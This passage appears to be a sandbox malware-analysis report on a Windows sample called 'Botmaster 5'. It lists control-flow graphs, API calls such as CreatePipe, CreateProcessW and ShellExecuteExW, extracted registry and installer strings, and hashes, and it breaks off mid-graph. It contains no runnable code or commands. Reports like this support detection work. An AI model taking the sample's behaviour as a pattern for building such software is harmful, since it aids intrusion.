                                                                                                                                                                                                                  control_flow_graph 1802 40f5a1-40f5fd memset 1803 40f60c 1802->1803 1804 40f5ff-40f60a 1802->1804 1805 40f610-40f618 1803->1805 1804->1805 1806 40f637-40f63a 1805->1806 1807 40f61a-40f61f 1805->1807 1809 40f674-40f67d 1806->1809 1810 40f63c-40f63f 1806->1810 1807->1806 1808 40f621-40f626 1807->1808 1808->1806 1811 40f628-40f635 1808->1811 1813 40f6f1-40f6f4 1809->1813 1814 40f67f-40f683 1809->1814 1810->1809 1812 40f641-40f656 CreatePipe 1810->1812 1815 40f670 1811->1815 1812->1809 1816 40f658-40f669 call 40f56a 1812->1816 1817 40f720-40f725 1813->1817 1818 40f6f6-40f6ff 1813->1818 1819 40f685-40f69a CreatePipe 1814->1819 1820 40f6b8-40f6bc 1814->1820 1815->1809 1816->1815 1825 40f727 1817->1825 1826 40f72c-40f72f 1817->1826 1823 40f701-40f705 GetStdHandle 1818->1823 1824 40f708-40f70b 1818->1824 1819->1820 1827 40f69c-40f6b1 call 40f56a 1819->1827 1820->1813 1821 40f6be-40f6d3 CreatePipe 1820->1821 1821->1813 1831 40f6d5-40f6ea call 40f56a 1821->1831 1823->1824 1833 40f714-40f717 1824->1833 1834 40f70d-40f711 GetStdHandle 1824->1834 1825->1826 1829 40f731 1826->1829 1830 40f738-40f765 wcslen * 2 HeapAlloc 1826->1830 1827->1820 1829->1830 1836 40f767-40f788 wcscpy wcscat * 2 1830->1836 1837 40f78a-40f792 wcscpy 1830->1837 1831->1813 1833->1817 1839 40f719-40f71d GetStdHandle 1833->1839 1834->1833 1840 40f793-40f799 1836->1840 1837->1840 1839->1817 1842 40f7b4-40f7b9 1840->1842 1843 40f79b-40f7b1 wcscat * 2 1840->1843 1844 40f7c3-40f7e9 CreateProcessW 1842->1844 1845 40f7bb-40f7be 1842->1845 1843->1842 1847 40f877-40f87a 1844->1847 1848 40f7ef-40f7f2 1844->1848 1845->1844 1846 40f7c0 1845->1846 1846->1844 1849 40f881-40f884 1847->1849 1850 40f87c-40f87f CloseHandle 1847->1850 1851 40f7f4-40f7f7 CloseHandle 1848->1851 1852 40f7f9-40f7fc 1848->1852 1853 40f886-40f889 CloseHandle 1849->1853 1854 40f88b-40f88e 1849->1854 1850->1849 1851->1852 1855 40f803-40f806 1852->1855 1856 40f7fe-40f801 CloseHandle 1852->1856 1853->1854 1859 40f890-40f893 CloseHandle 1854->1859 1860 40f895-40f898 1854->1860 1857 40f808-40f80b CloseHandle 1855->1857 1858 40f80d-40f816 CloseHandle 1855->1858 1856->1855 1857->1858 1861 40f823-40f826 1858->1861 1862 40f818-40f81d WaitForSingleObject 1858->1862 1859->1860 1863 40f89a-40f89d CloseHandle 1860->1863 1864 40f89f-40f8a2 1860->1864 1867 40f828-40f868 EnterCriticalSection call 4285d0 LeaveCriticalSection 1861->1867 1868 40f86d-40f872 CloseHandle 1861->1868 1862->1861 1863->1864 1865 40f8a4-40f8a7 CloseHandle 1864->1865 1866 40f8a9-40f8ac 1864->1866 1865->1866 1869 40f8b3-40f8b7 1866->1869 1870 40f8ae-40f8b1 CloseHandle 1866->1870 1878 40f98c-40f98f 1867->1878 1872 40f99a 1868->1872 1873 40f9a1-40f9bb HeapFree 1869->1873 1874 40f8bd-40f8c0 1869->1874 1870->1869 1872->1873 1876 40f8c2-40f8cf wcslen 1874->1876 1877 40f8fb-40f93f memset ShellExecuteExW 1874->1877 1876->1877 1879 40f8d1-40f8d5 1876->1879 1877->1873 1880 40f941-40f945 1877->1880 1878->1873 1881 40f8d7-40f8db 1879->1881 1882 40f8dd-40f8df 1879->1882 1883 40f952-40f955 1880->1883 1884 40f947-40f94c WaitForSingleObject 1880->1884 1881->1879 1881->1882 1882->1877 1885 40f8e1-40f8f8 wcscpy 1882->1885 1886 40f991-40f994 CloseHandle 1883->1886 1887 40f957-40f989 EnterCriticalSection call 4285d0 LeaveCriticalSection 1883->1887 1884->1883 1885->1877 1886->1872 1887->1878
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F5E9
                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0040F64E
                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0040F692
                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0040F6CB
                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,00000000), ref: 0040F703
                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,00000000), ref: 0040F70F
                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,?,00000000), ref: 0040F71B
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040F739
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040F743
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?,?,00000000), ref: 0040F758
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040F76E
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F777
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F780
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040F78C
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F7A3
                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F7DB
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F7F7
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F801
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F80B
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F810
                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 0040F81D
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046C260,?,?,00000000), ref: 0040F82E
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046C260,?,?,00000000), ref: 0040F845
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F87F
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F889
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F893
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F89D
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F8A7
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040F8B1
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040F8C3
                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040F8E5
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F904
                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040F937
                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000), ref: 0040F94C
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046C260,?,?,?,?,?,00000000), ref: 0040F95D
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046C260,?,?,?,?,?,00000000), ref: 0040F974
                                                                                                                                                                                                                    • Part of subcall function 0040F56A: GetCurrentProcess.KERNEL32(0040F6E6,00000000,00000000,00000002,00000100,?,?,0040F6E6,?,?,00000000), ref: 0040F57F
                                                                                                                                                                                                                    • Part of subcall function 0040F56A: GetCurrentProcess.KERNEL32(?,00000000,?,?,0040F6E6,?,?,00000000), ref: 0040F584
                                                                                                                                                                                                                    • Part of subcall function 0040F56A: DuplicateHandle.KERNEL32(00000000,?,?,0040F6E6,?,?,00000000), ref: 0040F587
                                                                                                                                                                                                                    • Part of subcall function 0040F56A: CloseHandle.KERNEL32(?,?,0040F6E6,?,?,00000000), ref: 0040F594
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040F994
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0040F9AB
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                                                                                                                                                                                                                  • String ID: 41C
                                                                                                                                                                                                                  • API String ID: 550696126-4121658310
                                                                                                                                                                                                                  • Opcode ID: 4d2a24b07462e8b0583448f33c3bf71192fa5218c5ba50a45ddbb19a49dba05a
                                                                                                                                                                                                                  • Instruction ID: 257813081c952a18ad069377244783b89e0f79eac355b175b07de754c0a97bd6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2a24b07462e8b0583448f33c3bf71192fa5218c5ba50a45ddbb19a49dba05a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE14A728002489BCF359FA5D884ADE3BF8FF08354F14413BF924A26A1D7799949CF95
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00404D70 Relevance: 51.9, APIs: 1, Strings: 28, Instructions: 1126COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$FreeHeapWrite$ChangeCloseCopyFindNotificationwcslen
                                                                                                                                                                                                                  • String ID: #DD$#DF$#DRK$#DRV$-hide$-wait$.exe$.lnk$Desktop.dat$Error$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_LOCAL_MACHINE$HKEY_USERS$IF_INSTALLPATH$IF_LANGUAGE$IF_ORGANISATION$IF_SERIAL$IF_USERNAME$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$Registry.dat$Setup Error!$Software\Microsoft\Windows\CurrentVersion\Uninstall\$Startmenu.dat$uninstall.dat$uninstall_l.ifl
                                                                                                                                                                                                                  • API String ID: 2192183445-2974369863
                                                                                                                                                                                                                  • Opcode ID: bee00819f4d37c131e8f695ceb2082c0d52e70a9c318a63337ae284510ba020c
                                                                                                                                                                                                                  • Instruction ID: 4149f498faa66e2d6274eaf894bdcfc37299ce36a541daf05cc13fa73d28970b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bee00819f4d37c131e8f695ceb2082c0d52e70a9c318a63337ae284510ba020c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9A251B1204301ABD711AB61EC42B5B77B9FF44314F10843FF6489A2A2D7B95C919F9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040FA07 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 208stringmemoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2485 40fa07-40fa14 2486 40fa16-40fa19 2485->2486 2487 40fa29-40fa2d 2485->2487 2486->2487 2488 40fa1b-40fa1e 2486->2488 2489 40fa5a-40fa5c 2487->2489 2490 40fa2f-40fa31 2487->2490 2488->2487 2491 40fa20-40fa27 CloseHandle 2488->2491 2492 40fa62-40fa65 2489->2492 2494 40fbf3-40fbf6 2489->2494 2490->2492 2493 40fa33-40fa38 2490->2493 2491->2487 2497 40fbd6-40fbdb 2492->2497 2498 40fa6b-40fa73 2492->2498 2493->2489 2495 40fa3a-40fa56 CreateFileW 2493->2495 2496 40fc06-40fc08 2494->2496 2495->2489 2501 40fa58 2495->2501 2504 40fbf8-40fc05 call 428590 2496->2504 2505 40fc0a-40fc10 2496->2505 2499 40fbeb-40fbed FindCloseChangeNotification 2497->2499 2500 40fbdd-40fbe5 HeapFree 2497->2500 2502 40fa75-40fa78 2498->2502 2503 40fa7a 2498->2503 2499->2494 2500->2499 2501->2489 2507 40fa7c-40fa7f 2502->2507 2503->2507 2504->2496 2508 40fc20-40fc25 2505->2508 2509 40fc12-40fc1a HeapFree 2505->2509 2511 40faba-40fac0 2507->2511 2512 40fc35-40fc44 memset 2508->2512 2513 40fc27-40fc2f HeapFree 2508->2513 2509->2508 2514 40fa81-40fa87 2511->2514 2515 40fac2-40fac4 2511->2515 2513->2512 2518 40fa89-40fa8c 2514->2518 2519 40faab-40fab3 strlen 2514->2519 2516 40fac6-40fad9 SetFilePointer SetEndOfFile 2515->2516 2517 40fade-40faf5 HeapAlloc 2515->2517 2522 40fbd5 2516->2522 2517->2522 2523 40fafb-40fb04 2517->2523 2518->2519 2520 40fa8e-40faa9 strlen * 2 2518->2520 2521 40fab7-40fab9 2519->2521 2520->2521 2521->2511 2522->2497 2524 40fb06-40fb1c strcpy strlen 2523->2524 2525 40fb1e-40fb21 2523->2525 2524->2525 2526 40fb9a-40fb9c 2525->2526 2527 40fb23-40fb29 2526->2527 2528 40fb9e-40fbcf SetFilePointer WriteFile SetEndOfFile HeapFree 2526->2528 2529 40fb46-40fb49 2527->2529 2530 40fb2b-40fb44 strcpy strcat 2527->2530 2528->2522 2532 40fb64-40fb76 strcpy strcat 2529->2532 2533 40fb4b-40fb62 strcpy strcat 2529->2533 2531 40fb79-40fb7f strcat 2530->2531 2534 40fb82-40fb98 strcat strlen 2531->2534 2532->2531 2533->2534 2534->2526
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000,0046AFD4), ref: 0040FA21
                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000), ref: 0040FA4B
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FA91
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FA9B
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FAAE
                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!), ref: 0040FACB
                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000), ref: 0040FAD3
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000), ref: 0040FAE7
                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,0043314C,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000), ref: 0040FB0C
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FB12
                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,00433148,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000), ref: 0040FB31
                                                                                                                                                                                                                  • strcat.MSVCRT(00000000,?,00000000,00433148,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!), ref: 0040FB3A
                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,00433140,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000), ref: 0040FB51
                                                                                                                                                                                                                  • strcat.MSVCRT(00000000,?,00000000,00433140,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!), ref: 0040FB5A
                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000), ref: 0040FB66
                                                                                                                                                                                                                  • strcat.MSVCRT(00000000, = ,00000000,?,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!), ref: 0040FB71
                                                                                                                                                                                                                  • strcat.MSVCRT(00000000,?,00000000, = ,00000000,?,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000), ref: 0040FB7A
                                                                                                                                                                                                                  • strcat.MSVCRT(00000000,00433138,0043A840,00000007,00000000), ref: 0040FB88
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040FB8E
                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0043A840,00000007,00000000), ref: 0040FBA3
                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,0043A840,00000007,00000000), ref: 0040FBB9
                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,?,?,?,0043A840,00000007,00000000), ref: 0040FBC1
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0043A840,00000007,00000000), ref: 0040FBCF
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000), ref: 0040FBE5
                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000), ref: 0040FBED
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000), ref: 0040FC1A
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0040FC73,00000000,0040486F,00404828,00000000,Error,Setup Error!,00000010,00000000,00000000,00000000), ref: 0040FC2F
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FC39
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$Heapstrcatstrlen$Freestrcpy$ClosePointer$AllocChangeCreateFindHandleNotificationWritememset
                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                  • API String ID: 3308001263-2525689732
                                                                                                                                                                                                                  • Opcode ID: bae60c5762a20af3d75e740f0bcc6243069a0f01c1d799ee24d6f3115bd9f968
                                                                                                                                                                                                                  • Instruction ID: c7c249bcb8de922bb31b40cfe678dccd13b635899d2c6cd190e15f46aa4f12b6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae60c5762a20af3d75e740f0bcc6243069a0f01c1d799ee24d6f3115bd9f968
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F61C471200204AFCB306F51DC85C2FB7B9FB19744B20483EF645A1A61D7BAAC59DF1A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041DCC0 Relevance: 44.9, APIs: 23, Strings: 2, Instructions: 1148COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $SysListView32
                                                                                                                                                                                                                  • API String ID: 0-2148278154
                                                                                                                                                                                                                  • Opcode ID: 93a46a1aa193c7c706cfa34e53430b6df0d93683d466b6fae8325fec156f8587
                                                                                                                                                                                                                  • Instruction ID: a2a7c53041db397b0e8ff06ccd578a4cc7ebc0a6bf5f6ffe1aab2e75f232bdea
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93a46a1aa193c7c706cfa34e53430b6df0d93683d466b6fae8325fec156f8587
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B21979108309EFDB11AF11D8806DA77A1FB48314F50482AFEA587362E379ADD1CF5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424A65 Relevance: 38.9, APIs: 20, Strings: 2, Instructions: 378windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2935 424a65-424a94 call 428039 call 42516e 2940 424f14-424f18 2935->2940 2941 424a9a-424aa2 2935->2941 2942 424ae3 2941->2942 2943 424aa4-424ab7 GetPropW 2941->2943 2944 424ae7-424ae9 2942->2944 2945 424ac9-424acc 2943->2945 2946 424ab9-424ac7 GetParent 2943->2946 2947 424b0a-424b0f 2944->2947 2948 424aeb-424af0 2944->2948 2945->2942 2949 424ace-424ae1 call 427eaa 2945->2949 2946->2943 2946->2945 2950 424af2-424b03 2947->2950 2951 424b11-424b28 2947->2951 2948->2947 2948->2950 2949->2944 2950->2951 2964 424b05 2950->2964 2954 424e25-424e2c 2951->2954 2955 424b2e 2951->2955 2956 424e32 2954->2956 2957 424ed0-424ed7 2954->2957 2959 424da1-424db8 call 4249ef 2955->2959 2960 424b34-424b37 2955->2960 2962 424e34-424e3b 2956->2962 2963 424e89-424e8f 2956->2963 2965 424f07 2957->2965 2966 424ed9-424eda 2957->2966 2987 424f0d 2959->2987 2988 424dbe-424dc5 2959->2988 2967 424cd6-424cd9 2960->2967 2968 424b3d 2960->2968 2971 424e70-424e72 2962->2971 2972 424e3d 2962->2972 2979 424e91-424e93 2963->2979 2980 424ea8 2963->2980 2964->2940 2969 424f0a 2965->2969 2973 424ef9-424f05 2966->2973 2974 424edc-424edf 2966->2974 2977 424d7a-424d7c 2967->2977 2978 424cdf-424ce2 2967->2978 2975 424b43-424b46 2968->2975 2976 424c79-424c7b 2968->2976 2969->2987 2982 424f11 2971->2982 2991 424e78-424e84 2971->2991 2972->2982 2990 424e43-424e49 2972->2990 2973->2969 2974->2982 2992 424ee1-424eeb 2974->2992 2993 424b48-424b4a 2975->2993 2994 424b5c-424b5e 2975->2994 2985 424cc0-424cd1 call 4258f1 2976->2985 2986 424c7d-424c81 2976->2986 2981 424d82-424d86 2977->2981 2977->2982 2995 424ce4-424ce7 2978->2995 2996 424d15-424d17 2978->2996 2983 424ea4-424ea6 2979->2983 2984 424e95-424e96 2979->2984 2989 424eaa-424eba call 4258f1 2980->2989 2981->2982 3003 424d8c-424d9c EnumChildWindows 2981->3003 2982->2940 2983->2989 3004 424ea0-424ea2 2984->3004 3005 424e98-424e9a 2984->3005 2985->2982 3007 424c83-424ca7 GetClientRect FillRect 2986->3007 3008 424ca9-424cae 2986->3008 2987->2982 3009 424df1-424df4 2988->3009 3010 424dc7-424de1 GetWindowLongW 2988->3010 3021 424ebd-424ece PostMessageW 2989->3021 2990->2992 3000 424e4f-424e55 2990->3000 2991->2987 3013 424eec-424ef7 call 4249ef 2992->3013 3001 424be0-424be6 2993->3001 3002 424b50-424b51 2993->3002 2994->2987 3006 424b64-424b69 2994->3006 2997 424d05-424d10 2995->2997 2998 424ce9-424cec 2995->2998 2996->2982 2999 424d1d-424d24 2996->2999 2997->3013 2998->2982 3014 424cf2-424cfa RemovePropW 2998->3014 3015 424d26-424d2c 2999->3015 3016 424d2e-424d3b GetWindowLongW 2999->3016 3000->2982 3017 424e5b-424e61 3000->3017 3029 424bd4-424bdb 3001->3029 3030 424be8-424beb 3001->3030 3018 424b53-424b56 3002->3018 3019 424b7f-424b84 3002->3019 3003->2982 3004->2989 3020 424e9c-424e9e 3005->3020 3005->3021 3006->2987 3022 424b6f-424b7a 3006->3022 3007->2985 3008->2985 3023 424cb0-424cb5 3008->3023 3026 424df6-424dfb 3009->3026 3027 424ded-424def 3009->3027 3010->2987 3024 424de7 3010->3024 3013->2982 3014->2997 3033 424d44-424d4b 3015->3033 3016->3033 3034 424d3d 3016->3034 3017->2992 3035 424e63-424e69 3017->3035 3018->2982 3018->2994 3037 424b86-424b96 GetPropW 3019->3037 3038 424bb5-424bcf GetFocus SetPropW call 425717 3019->3038 3020->2989 3021->2982 3036 424c6c-424c74 call 4258f1 3022->3036 3023->2985 3039 424cb7-424cbd 3023->3039 3024->3027 3041 424e09-424e0e 3026->3041 3042 424dfd 3026->3042 3040 424e19-424e20 3027->3040 3029->2982 3030->2982 3043 424bf1-424bf7 3030->3043 3048 424d53-424d5a 3033->3048 3049 424d4d-424d50 3033->3049 